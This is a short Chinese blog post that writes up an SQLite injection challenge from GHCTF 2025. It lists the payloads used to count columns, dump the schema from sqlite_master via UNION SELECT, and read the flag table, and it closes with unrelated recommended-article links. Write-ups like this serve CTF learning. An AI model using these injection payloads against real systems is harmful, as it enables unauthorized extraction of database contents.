[GHCTF 2025]SQL???

迭归2025-06-04 16:40

打开题目在线环境:

先尝试注入:

id=1;show databases;

发现报错,后来看了wp才知道这个题目是SQLite注入。

我看的是这个师傅的wp:

https://blog.csdn.net/2401_86190146/article/details/146164505?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522b2e94c28c4b9713fffb8456c983de1b3%2522%252C%2522scm%2522%253A%252220140713.130102334...%2522%257D\&request_id=b2e94c28c4b9713fffb8456c983de1b3\&biz_id=0\&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend\~default-1-146164505-null-null.142^v102^pc_search_result_base9\&utm_term=[GHCTF 2025]SQL\&spm=1018.2226.3001.4187

1.先判断有几列

python 复制代码 
? id=1 order by 6 #

到第六列时:

2.爆出来表名

python 复制代码 
/?id=1 union select 1,2,3,4,group_concat(sql) from sqlite_master

所以我们要找的就是flag表里的flag列

直接payload:

python 复制代码 
/?id=1 union select 1,2,3,4,flag from flag

在这里插入图片描述

相关推荐
m0_7400437310 小时前
【无标题】
java·spring boot·spring·spring cloud·微服务
我能坚持多久10 小时前
D20—C语言文件操作详解:从基础到高级应用
c语言·开发语言
橘子师兄10 小时前
C++AI大模型接入SDK—ChatSDK封装
开发语言·c++·人工智能·后端
@ chen10 小时前
Spring事务 核心知识
java·后端·spring
aithinker10 小时前
使用QQ邮箱收发邮件遇到的坑 有些WIFI不支持ipv6
java
上天_去_做颗惺星 EVE_BLUE10 小时前
Docker高效使用指南:从基础到实战模板
开发语言·ubuntu·docker·容器·mac·虚拟环境
2401_8576835410 小时前
C++中的原型模式
开发语言·c++·算法
s1hiyu10 小时前
C++动态链接库开发
开发语言·c++·算法
(❁´◡`❁)Jimmy(❁´◡`❁)10 小时前
CF2188 C. Restricted Sorting
c语言·开发语言·算法
星火开发设计11 小时前
C++ 预处理指令:#include、#define 与条件编译
java·开发语言·c++·学习·算法·知识
热门推荐
01GitHub 镜像站点02Clawdbot 中文汉化版 接入微信、飞书03OpenClaw部署与配置教程:在Mac mini上接入国产大模型与飞书042026美赛A题智能手机电池续航时间预测的连续时间数学模型05OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)06UV安装并设置国内源07Linux下V2Ray安装配置指南08Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services092025 年大语言模型发展回顾:关键突破、意外转折与 2026 年展望10Claude Code Skills 实用使用手册